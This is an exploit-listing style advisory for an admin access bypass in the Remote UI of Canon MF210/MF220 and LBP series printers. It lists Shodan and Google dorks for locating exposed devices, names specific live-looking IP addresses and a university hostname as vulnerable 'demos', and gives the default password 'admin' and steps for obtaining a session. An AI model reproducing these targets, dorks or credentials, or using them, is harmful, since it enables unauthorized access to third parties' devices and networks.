# Title: Canon Company Printers Error Access Bypass # Date: 06.06.2018 # Vendor: https://global.canon/en/index.html # Author (s): Informacion - Anonymous - Huy Kha # Version: MF210 & MF20 Series : Risk: Medium # Exploit reference: https://cxsecurity.com/issue/WLB-2018060066 # Description: in mod user default session, in admin bypass :). # Dorks and Dem0s: ## Dork general: Shodan: "Canon MF210 : MF220 : LBP6650 : LBP3370 : LBP3460 : LBP7750C" +-- Canon MF210 Dork: intitle:"Remote UI: Login: MF210 Series: MF210 Series" * Dem0: http://111.223.95.184/portal_top.html pwd: admin +-- Canon LBP6650 Dork: intitle:":LBP6650 ; LBP6650" * Dem0s: - http://soe001231.soziologie.uni-konstanz.de/tlogin.cgi - http://131.114.132.8/frame.cgi?page=DevStatus : Select "Modalità utente" is italian language, push "Ok" and good session. - http://31.62.214.40/frame.cgi?page=DevStatus "" +-- Canon LBP7750C * Dem0: http://140.164.74.176/frame.cgi?page=DevStatus +-------------------------------------------------------------------------+